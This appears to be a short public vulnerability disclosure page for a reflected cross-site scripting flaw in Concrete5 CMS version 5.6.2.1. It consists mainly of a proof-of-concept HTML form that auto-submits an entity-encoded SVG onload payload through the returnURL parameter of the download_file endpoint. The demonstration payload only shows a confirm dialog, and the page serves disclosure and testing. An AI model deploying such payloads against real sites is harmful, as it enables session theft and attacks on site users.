facebook facebook twitter rss

Concrete 5.6.2.1 POST XSS

Author: Osanda Malith Jayathissa , Published: 19-07-2014
Title: Concrete 5.6.2.1 POST XSS
Vendor: http://www.concrete5.org/
Author: Osanda Malith Jayathissa (@OsandaMalith)
E-Mail: osanda [cat] unseen.is
Video: https://www.youtube.com/watch?v=XMttXL9v4bE
Orginal write-up: http://osandamalith.wordpress.com/2014/07/18/concrete-5-6-2-1-multiple-xss

[+] POC
---------

<html>
<body>
<form name="exploit" action="http://localhost/index.php/download_file" method="POST">
<input type="hidden" name="returnURL" value="&quot;&gt;&lt;svg&#47;onload&#61;confirm&#40;&apos;Hello&apos;&#41;&gt;" />
<script>document.exploit.submit(); </script>
</form>
</body>
</html>

Like us on Facebook :